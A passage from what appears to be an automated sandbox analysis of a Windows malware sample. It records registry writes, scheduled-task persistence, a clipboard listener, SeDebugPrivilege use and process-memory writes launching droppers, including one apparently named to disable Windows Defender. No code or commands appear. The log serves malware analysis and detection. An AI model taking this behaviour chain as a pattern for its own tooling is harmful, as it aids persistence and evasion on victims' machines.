Set value (str) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\32f11c7c-3c99-47aa = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\MostRecentlyUsed C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\CurrentWorkingDirectory C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c92eb376-4e5d-410f = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c92eb376-4e5d-410f = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\430d0482-62a8-4622 = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bc75472c-0f5a-47b9 = "\\\\?\\Volume{88F8157C-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\d9b2767360708420e74d29e3d125ef9b042b19fbb3ab038528a08c810e868c1a" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a0758fc9-3119-48de = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a0758fc9-3119-48de = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\209b8066-ed4f-494f = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c5faf247-5257-402c C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c5faf247-5257-402c = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000336a991c20c9db0110c5361d20c9db0110c5361d20c9db01e7600c000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000b45a59052000643962323736373336303730383432306537346432396533643132356566396230343262313966626233616230333835323861303863383130653836386331610000b20009000400efbeb45a5905b45a59052e00000000000000000000000000000000000000000000000000bccb9900640039006200320037003600370033003600300037003000380034003200300065003700340064003200390065003300640031003200350065006600390062003000340032006200310039006600620062003300610062003000330038003500320038006100300038006300380031003000650038003600380063003100610000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000001ba978ef1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c64396232373637333630373038343230653734643239653364313235656639623034326231396662623361623033383532386130386338313065383638633161000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006c7a676f6e62746a0000000000000000d07758bc69233b4ea7ba0bbf192db8783ca5c5e16c27f011a617f2717f61ef81d07758bc69233b4ea7ba0bbf192db8783ca5c5e16c27f011a617f2717f61ef81d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0033003900350031003900380036003300350038002d0034003000300036003900310039003800340030002d0031003000300039003600390030003800340032002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000007c15f888000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable C:\Windows\System32\RuntimeBroker.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\x69.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\250519-z3llfszks4.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\x69.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\x69.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\x69.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5408 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\250519-z3llfszks4.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5408 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\250519-z3llfszks4.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5408 wrote to memory of 516 N/A C:\Users\Admin\AppData\Local\Temp\250519-z3llfszks4.exe C:\Windows\System32\schtasks.exe
PID 5408 wrote to memory of 516 N/A C:\Users\Admin\AppData\Local\Temp\250519-z3llfszks4.exe C:\Windows\System32\schtasks.exe
PID 1520 wrote to memory of 1008 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\x69.exe
PID 1520 wrote to memory of 1008 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\x69.exe
PID 5408 wrote to memory of 928 N/A C:\Users\Admin\AppData\Local\Temp\250519-z3llfszks4.exe C:\Users\Admin\AppData\Roaming\x69.exe
PID 5408 wrote to memory of 928 N/A C:\Users\Admin\AppData\Local\Temp\250519-z3llfszks4.exe C:\Users\Admin\AppData\Roaming\x69.exe
PID 5408 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\250519-z3llfszks4.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5408 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\250519-z3llfszks4.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5408 wrote to memory of 3996 N/A C:\Users\Admin\AppData\Local\Temp\250519-z3llfszks4.exe C:\Windows\System32\schtasks.exe
PID 5408 wrote to memory of 3996 N/A C:\Users\Admin\AppData\Local\Temp\250519-z3llfszks4.exe C:\Windows\System32\schtasks.exe
PID 5408 wrote to memory of 5740 N/A C:\Users\Admin\AppData\Local\Temp\250519-z3llfszks4.exe C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe
PID 5408 wrote to memory of 5740 N/A C:\Users\Admin\AppData\Local\Temp\250519-z3llfszks4.exe C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe
PID 5408 wrote to memory of 5740 N/A C:\Users\Admin\AppData\Local\Temp\250519-z3llfszks4.exe C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe
PID 5408 wrote to memory of 3268 N/A C:\Users\Admin\AppData\Local\Temp\250519-z3llfszks4.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5408 wrote to memory of 3268 N/A C:\Users\Admin\AppData\Local\Temp\250519-z3llfszks4.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3576 wrote to memory of 4844 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe
PID 3576 wrote to memory of 4844 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe
PID 3576 wrote to memory of 4844 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe
PID 5740 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe
PID 5740 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe
PID 5740 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe
PID 4844 wrote to memory of 640 N/A C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe
PID 4844 wrote to memory of 640 N/A C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe
PID 4844 wrote to memory of 640 N/A C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe
PID 5740 wrote to memory of 5072 N/A C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe C:\Windows\system32\cmd.exe
PID 5740 wrote to memory of 5072 N/A C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe C:\Windows\system32\cmd.exe
PID 5072 wrote to memory of 2168 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5072 wrote to memory of 2168 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3852 wrote to memory of 4852 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3852 wrote to memory of 4852 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5408 wrote to memory of 5584 N/A C:\Users\Admin\AppData\Local\Temp\250519-z3llfszks4.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5408 wrote to memory of 5584 N/A C:\Users\Admin\AppData\Local\Temp\250519-z3llfszks4.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5072 wrote to memory of 5452 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5072 wrote to memory of 5452 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5408 wrote to memory of 4588 N/A C:\Users\Admin\AppData\Local\Temp\250519-z3llfszks4.exe C:\Users\Admin\AppData\Roaming\x69install.exe
PID 5408 wrote to memory of 4588 N/A C:\Users\Admin\AppData\Local\Temp\250519-z3llfszks4.exe C:\Users\Admin\AppData\Roaming\x69install.exe
PID 5408 wrote to memory of 4588 N/A C:\Users\Admin\AppData\Local\Temp\250519-z3llfszks4.exe C:\Users\Admin\AppData\Roaming\x69install.exe
PID 4588 wrote to memory of 4472 N/A C:\Users\Admin\AppData\Roaming\x69install.exe C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe
PID 4588 wrote to memory of 4472 N/A C:\Users\Admin\AppData\Roaming\x69install.exe C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe
PID 4588 wrote to memory of 4472 N/A C:\Users\Admin\AppData\Roaming\x69install.exe C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe
PID 3852 wrote to memory of 3720 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3852 wrote to memory of 3720 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 920 wrote to memory of 2356 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\x69install.exe
PID 920 wrote to memory of 2356 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\x69install.exe
PID 920 wrote to memory of 2356 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\x69install.exe
PID 5072 wrote to memory of 4704 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5072 wrote to memory of 4704 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3852 wrote to memory of 3700 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3852 wrote to memory of 3700 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1008 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Roaming\x69.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1008 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Roaming\x69.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3852 wrote to memory of 1276 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3852 wrote to memory of 1276 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5072 wrote to memory of 5244 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5072 wrote to memory of 5244 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1008 wrote to memory of 5888 N/A C:\Users\Admin\AppData\Roaming\x69.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1008 wrote to memory of 5888 N/A C:\Users\Admin\AppData\Roaming\x69.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3852 wrote to memory of 2896 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3852 wrote to memory of 2896 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
